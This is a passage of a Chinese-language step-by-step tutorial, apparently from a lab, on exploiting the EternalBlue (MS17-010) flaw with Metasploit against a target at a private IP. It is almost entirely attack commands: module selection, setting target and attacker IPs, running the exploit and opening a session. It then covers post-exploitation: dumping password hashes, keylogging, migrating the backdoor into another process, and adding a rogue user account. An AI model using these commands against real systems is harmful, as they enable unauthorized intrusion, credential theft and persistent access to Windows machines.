5.永恒之蓝的操作与应用
5.1查询ms117模块
search ms17
5.2 进入永恒之蓝攻击模块
use 0
5.3 查看主要参数
show options
5.4 设置攻击机IP和靶机IP
192.168.251.137 靶机IP 192.168.251.132 攻击机IP set rhosts 192.168.251.137 set lhost 192.168.251.132
5.5 运行
run
5.6 backgroud保留当前运行的session并退出
background
5.7 sessions查看当前session
sessions
5.8 进入靶机
sessions -i 1(表示id)
5.9 常用命令
5.9.1 shell获取终端信息
shell
这里出现乱码
5.9.2 解决乱码
chcp 65001
5.9.3 常用命令以及解释总结
help #获取所有可用命令 getuid #获取当前权限 screenshot #截屏 hashdump #获取密码的hash ps #获取进程列表 sysinfo #获取系统信息 route #获取路由表 getpid #获取当前攻入的进程pid migrate #将当前后门注入迁移到其他程序 keyscan_start # 开启键盘记录 keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe download/upload #上传下载文件 keyscan_stop # 监视键盘记录 bg # 回到metasploit界面
5.10 如何使用永恒之蓝攻击靶机
这里以创建一个新用户举例
1.创建一个新用户gaogood
net user gaogood Gg123456 /add
2.查看是否创建成功
创建成功